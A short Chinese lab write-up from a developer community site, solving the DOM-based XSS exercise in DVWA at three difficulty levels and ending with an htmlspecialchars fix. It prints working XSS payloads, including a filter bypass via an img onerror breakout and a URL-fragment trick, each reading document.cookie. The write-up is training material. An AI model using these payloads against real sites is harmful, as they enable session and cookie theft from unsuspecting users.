AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

[dvwa] xss dom

2024-04-15 44
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: [dvwa] xss dom

xss dom

0x01 low

<script>alert(document.cookie)</script>

弹个窗

script被写入html

0x02 medium

过滤<script

考虑使用img标签,其onerror属性在该元素加载src错误时触发

注入元素被写入value,就在value闭合option 和 select标签

</option></select><img src=1 onerror=alert(document.cookie)>

0x03 high

参数接收属于php代码,使用#注释,参数不会被发送到后端,但会在浏览器中执行

English #<script>alert(document.cookie)</script>

0x04 Repair 修复漏洞

$message = htmlspecialchars($message);
$name = htmlspecialchars($name);

htmlspecialchars非常好用,将尖括号转化为html实体,浏览器前端代码不执行

或者用正则把尖括号过滤也能成,尖括号在js或html中被广泛用到

文章标签:
JavaScript
PHP
前端开发
安全
关键词:
xss dom
游客ebi4wp2ql3fxg
目录
相关文章
小周sir
|
6月前
|
监控 JavaScript 安全
DOM Based XSS的防范措施有哪些
【8月更文挑战第25天】DOM Based XSS的防范措施有哪些
小周sir
115 3
小周sir
|
6月前
|
JavaScript 安全 前端开发
介绍DOM Based XSS
【8月更文挑战第25天】介绍DOM Based XSS
小周sir
78 1
香甜可口草莓蛋糕
|
9月前
|
JavaScript
High 级别 DOM 型 XSS 演示(附链接)
High 级别 DOM 型 XSS 演示(附链接)
香甜可口草莓蛋糕
88 3
香甜可口草莓蛋糕
|
9月前
|
JavaScript
Medium 级别 DOM 型 XSS 演示(附链接)
Medium 级别 DOM 型 XSS 演示(附链接)
香甜可口草莓蛋糕
84 0
香甜可口草莓蛋糕
|
9月前
|
JavaScript
Low 级别 DOM 型 XSS 演示(附链接)
Low 级别 DOM 型 XSS 演示(附链接)
香甜可口草莓蛋糕
64 0
香甜可口草莓蛋糕
|
9月前
|
存储 JavaScript 前端开发
DOM 型 XSS 演示(附链接)
DOM 型 XSS 演示(附链接)
香甜可口草莓蛋糕
388 0
秋说
|
JavaScript 前端开发 网络安全
[网络安全]DVWA之XSS(DOM)攻击姿势及解题详析合集
XSS(DOM)-low level 源代码未进行任何过滤 复选框中的内容为可变参数
秋说
196 0
趁你还年轻233
|
Web App开发 存储 前端开发
记一次简单的DOM XSS攻击实验
之前就对XSS有所耳闻,不过昨天在学习《深入浅出nodejs》过程中,才深入了解到XSS攻击的原理,于是找到那本很早就想看的《web前端黑客技术解密》,找到 跨站攻击脚本XSS 章节,于是有了下面这个简单的XSS攻击实验。
趁你还年轻233
411 0
记一次简单的DOM XSS攻击实验
cnbird
|
JavaScript 前端开发 Ruby
Easy DOM-based XSS detection via Regexes
If you are interested in finding DOM-based XSS, you must have knowledge of http://code.
cnbird
868 0
cnbird
|
JavaScript 安全
DOM XSS Scanner - Find DOM based XSS Security Vulnerabilities
https://github.com/yaph/domxssscanner http://code.
cnbird
1003 0